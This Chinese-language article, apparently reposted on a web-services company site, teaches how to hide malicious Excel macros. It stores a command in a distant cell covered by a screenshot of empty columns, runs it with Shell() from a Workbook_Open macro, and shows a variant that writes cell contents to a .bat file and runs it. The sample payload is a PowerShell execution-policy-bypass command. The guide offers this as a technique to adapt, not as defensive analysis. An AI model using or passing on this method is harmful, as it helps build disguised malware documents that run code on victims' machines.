如何在Excel中更好地隐藏恶意宏代码

 你可能会问,为什么不简单地使用实际上不涉及工作簿的代码,以及主要原因是避免网络流量。当然,你可以简单地添加宏,这些宏会将每行代码添加到一个新文件中,以避免网络流量,但是这样做会使活动对于任何分析文档的人来说都是显而易见的,他们会在查看时立即看到新的代码行宏。使用这种方法,它使得对恶意文档的分析稍微困难一些,但是当然不是很多。

成都创新互联公司专注为客户提供全方位的互联网综合服务,包含不限于成都网站建设、成都做网站、沙市网络推广、重庆小程序开发、沙市网络营销、沙市企业策划、沙市品牌公关、搜索引擎seo、人物专访、企业宣传片、企业代运营等,从售前售中售后,我们都将竭诚为您服务,您的肯定,是我们最大的嘉奖;成都创新互联公司为所有大学生创业者提供沙市建站搭建服务,24小时服务热线:18982081108,官方网址:www.cdcxhl.com

注意:仅对文档运行oledump或olevba之类的工具将返回宏。

此时你会看到,该宏正在从特定列中提取代码并使用Shell()执行该代码,但该代码显然非常可疑:

而且,如果我们导航到代码所在的BG1,我们不会立即看到任何可疑的东西:但是,如果将鼠标悬停在BG1上(或者稍微靠近一下并注意到未对齐的列),那么你会看到在代码上覆盖了一个图像:

显然,更有耐心的人可以完善空列的屏幕截图,并将其覆盖在代码顶部以使其不那么引人注意。揭示从工作表中提取的代码的另一种方法是使用MsgBox:

1. 一组要覆盖在代码顶部的空列的屏幕截图,例如:

2. 从工作簿中提取代码并运行数据的宏:

 
 
 
    
  
  
  
  1. Private Sub Workbook_Open() 
    2. 
  
  
  
  2. Data = Sheet1.Range("BG1") 
    3. 
  
  
  
  3. Shell(Data) 
    4. 
  
  
  
  4. End Sub 
    5.

 

Data = Sheet1.Range("BG1")仅查看位于BG1的行,提取该行中的所有内容并将其放在变量Data中。

3. 打开文档并在用户单击“启用内容”后将提取并执行的代码。

 
 
 
    
  
  
  
  1. powershell.exe -exec bypass -C echo "Hello world" > C:\Users\Desktop\Conduct\Desktop\test.txt 
    2.

将代码插入所需的任何列后,只需将空列的图像插入代码上方(插入>插图>图片)。

然后将宏插入ThisWorkbook并更改Range()部分以与你的列匹配。因此,如果你将数据插入A列并且位于第一行,它就是Range("A1")。

将多行写入文件

向文件写入多行只是小菜一碟,只需要添加几行代码即可。

使用的宏代码如下所示:

 
 
 
    
  
  
  
  1. Private Sub Workbook_Open() 
    2. 
  
  
  
  2. 1. Dim Path As String 
    3. 
  
  
  
  3. 2. Dim FileNumber As Integer 
    4. 
  
  
  
  4. 3. FileNumber = FreeFile 
    5. 
  
  
  
  5. 4. Data = Sheet1.Range("BG1") 
    6. 
  
  
  
  6. 5. Data2 = Sheet1.Range("BG2") 
    7. 
  
  
  
  7. 6. Path = "test.bat" 
    8. 
  
  
  
  8. 7. Open Path For Output As FileNumber 
    9. 
  
  
  
  9. 8.    Print #FileNumber, Data 
    10. 
  
  
  
  10. 9.    Print #FileNumber, Data2 
    11. 
  
  
  
  11. 10.    Close FileNumber 
    12. 
  
  
  
  12. 11. Shell(Path) 
    13. 
  
  
  
  13. End Sub 
    14.

 

第1-3行是静态的,保持原样,它们只是定义使用的变量。第4-6行是动态的。你将需要根据excel工作表将4和5中的字符串更改为代码所在的位置。将第6行更改为所需的文件路径。

第7-9行也是动态的,它们仅打开文件并将已提取的数据写入文件。特别是第8和9行是负责将数据写入文件的行。

只需将要写入文件的代码插入到工作簿中,并记下该文件所在的列和行,并更改Data&Data1变量以与你的列和行匹配(如果需要的话,添加更多的变量)。然后,将工作簿中的代码与空行的屏幕截图叠加,然后开始就可以了!

分享题目:如何在Excel中更好地隐藏恶意宏代码
文章链接:http://www.shufengxianlan.com/qtweb/news21/502621.html

网站建设、网络推广公司-创新互联,是专注品牌与效果的网站制作,网络营销seo公司;服务项目有等

广告

声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联

猜你还喜欢下面的内容

ChatGPT知识

同城分类信息

成都小程序开发    江油网站建设    app网站建设    四川晃众门窗    成都主机托管    中国电信成都枢纽中心    响应式网站    成都网站推广    网站建设公司    广汉锦华建材    班戈纳美网站    电信内江机房    成都ssl证书申请    四川广汉锦华    德阳机房    网络营销推广    重庆网站营销    簇桥薇薇新娘    亮美家    托管服务器